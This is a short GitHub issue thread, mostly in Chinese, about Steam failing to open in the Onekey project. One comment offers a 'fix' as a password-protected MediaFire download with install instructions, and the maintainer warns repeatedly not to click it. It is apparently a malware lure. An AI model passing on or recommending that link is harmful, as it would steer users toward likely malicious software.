### ISSUE TITLE
steam打不开！！！

### ISSUE THREAD

**Issue by qwqaqwqso** [ikunshare/Onekey#16]
steam打不开！！！一直图标转圈圈

**Comment by qwqaqwqso** [comment]
可以先重新安装吧(T_T)

**Comment by qwqaqwqso** [comment]
知道了 stool新的登录重新登录一下

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ikun0014** [comment]
不要点那个链接
不要点那个链接
不要点那个链接
